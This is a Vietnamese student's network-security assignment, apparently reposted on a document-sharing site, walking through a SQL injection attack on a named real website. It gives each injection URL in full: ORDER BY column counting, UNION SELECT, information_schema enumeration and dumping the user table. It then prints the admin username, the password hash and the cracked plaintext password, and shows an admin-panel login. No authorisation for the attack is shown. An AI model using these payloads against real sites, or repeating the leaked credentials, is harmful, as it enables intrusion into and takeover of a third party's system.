1. Trang chủ
  2. » Giáo án - Bài giảng

Bài tập an toàn thông tin mạng

13 415 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 13
Dung lượng 4,8 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Bước 2:Đếm số cột dùng order by đế xác định cột.. Ban đầu mình thử đoán số column là 1... Hình 7 : Kết quả kiểm tra phiên bảnVậy ta có kết quả phiên bản là 5.1.73 Bây giờ ta tìm tất cả c

Trang 1

HUỲNH QUỐC NHA

LỚP 12TLT.CNTT

MÃ SINH VIÊN: 102120324

WEB HACK : http://www.hostingak.net/

Trang gốc chọn để hack : http://www.hostingak.net/?frame=product_detail&id=294

Hình 1 : Trang web gốc

Trang 2

Ta kiểm tra , bằng cách thêm dấu nháy “ ‘ ” sau URL : … Id=294 : http://www.hostingak.net/? frame=product_detail&id=294%27

Hình 2 : Kiểm tra trang web lỗi

Trang 3

Bước 2:Đếm số cột dùng order by đế xác định cột Ban đầu mình thử đoán số column là 1

Ta nhập vào link sau : http://www.hostingak.net/?frame=product_detail&id=294%20order%20by

Và kết quả là :

Hình 3 : kết quả bình thường khi thử với “ order by 1 ”

Trang 4

Ta tiếp tục thử với “ order bay 15 ”

http://www.hostingak.net/?frame=product_detail&id=294%20order%20by%2015 Kết quả là :

Hình 4 : kết quả vẩn bình thường khi thử với “ order by 15 ”

Trang 5

Ta tiếp tục thử với “ order by 16 ”

http://www.hostingak.net/?frame=product_detail&id=294%20order%20by%2016 Kết quả là :

Hình 5 : Kết quả lỗi khi thử với “ order by 16 ”

Vậy ta kết luận có 15 cột

Trang 6

Bước 3: Ta sử dụng Union liên kết 2 câu truy vấn, tìm table cần khai thác thông qua

information_schema.Tables

Đầu tiên thực hiện Union

http://www.hostingak.net/?frame=product_detail&id=null%20union%20select

%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015

Ta có kết quả :

Hinh 6: Kết quả khi ta sử dụng Union để tìm ra cột lỗi

Như vậy a đã biết được cột lỗi là cột thứ : 6

Trang 7

Tiếp đến ta sử dụng hàm version() để show ra version version() đặt ở 1 trong vị trí các column bị lỗi.ở đây mình đặt ở column số 6

http://www.hostingak.net/?frame=product_detail&id=null%20union%20select

%201,%202,3,4,5,%20version(),%207,%208,%209,%2010,%2011,%2012,13,14,15 và ta có kết quả

Trang 8

Hình 7 : Kết quả kiểm tra phiên bản

Vậy ta có kết quả phiên bản là 5.1.73

Bây giờ ta tìm tất cả các Table của database

http://www.hostingak.net/?frame=product_detail&id=null%20union%20select

%201,2,3,4,5,group_concat(unhex(hex(table_name))),%207,8,9,10,11,12,13,14,15%20from

%20information_schema.tables Kết quả là :

Hình 8: Kết quả truy vấn các Table của database

Tất cả các table của Database :

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPL

ICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,

GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTI

Trang 9

TS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SE

SSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE

_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,gopy,tbl_config,tbl_co

ntent,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_

product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor,thongti

nkhachhang

Bước 4 trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên, ở đây

ta chỉ chú ý đến tbl_user , để ta tìm các trường trong bảng này

http://www.hostingak.net/?frame=product_detail&id=null%20union%20select

%201,2,3,4,5,%20group_concat(unhex(hex(column_name))),

%207,%208,%209,%2010,%2011,12,13,14,15%20from%20information_schema.columns%20where

%20table_name=0x74626C5F75736572 Kết quả :

Trang 10

Hình 9: Kết quả tìm các trường trong bảng tbl_user

Vậy ta có 3 trường trong bảng này là id,uid,pwd

Bước 5: Vậy là ta có talbe và column cần thiết rôi ta chỉ việc khai thác thông tin ở đây , đó là uid và pwd

Lấy thông tin uid và pwd bằng câu truy vấn sau :

http://www.hostingak.net/?frame=product_detail&id=null%20uNion%20seleCt

%201,2,3,4,5,group_concat(uid,0x2f,pwd),7,8,9,10,11,12,13,14,15%20from%20tbl_user%20 %20-Kết quả :

Trang 11

Hình 10: Kết quả truy vấn uid và pwd

Vậy ta có kết quả là : admin/e3976d13683589d21ed11314e7254778

Nghĩa là uid : admin , pwd : e3976d13683589d21ed11314e7254778 , Ta mã hóa ra : 015243

Vậy ta đã có thông tin đăng nhập quản trị, ta chỉ việc tìm đến và đăng nhập

http://www.hostingak.net/admin/login.php

Trang 12

Hình 11 : Trang đăng nhập

Đăng nhập với Username : admin Password : 015243

Nhấn button Đăng Nhập

Và đây là kết quả:

Trang 13

Hình 12 : Trang Quản trị website

Ngày đăng: 24/03/2015, 23:24

Xem thêm

HÌNH ẢNH LIÊN QUAN

Hình 1 : Trang web gốc - Bài tập an toàn thông tin mạng
Hình 1 Trang web gốc (Trang 1)
Hình 2 : Kiểm tra trang web lỗi - Bài tập an toàn thông tin mạng
Hình 2 Kiểm tra trang web lỗi (Trang 2)
Hình 3 : kết quả bình thường khi thử với “ order by 1--” - Bài tập an toàn thông tin mạng
Hình 3 kết quả bình thường khi thử với “ order by 1--” (Trang 3)
Hình 5 : Kết quả lỗi khi thử với “ order by 16 ” - Bài tập an toàn thông tin mạng
Hình 5 Kết quả lỗi khi thử với “ order by 16 ” (Trang 5)
Hình 7 : Kết quả kiểm tra phiên bản - Bài tập an toàn thông tin mạng
Hình 7 Kết quả kiểm tra phiên bản (Trang 8)
Hình 9: Kết quả tìm các trường trong bảng tbl_user - Bài tập an toàn thông tin mạng
Hình 9 Kết quả tìm các trường trong bảng tbl_user (Trang 10)
Hình 10: Kết quả truy vấn uid và pwd - Bài tập an toàn thông tin mạng
Hình 10 Kết quả truy vấn uid và pwd (Trang 11)
Hình 11 : Trang đăng nhập - Bài tập an toàn thông tin mạng
Hình 11 Trang đăng nhập (Trang 12)
Hình 12 : Trang Quản trị website - Bài tập an toàn thông tin mạng
Hình 12 Trang Quản trị website (Trang 13)

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w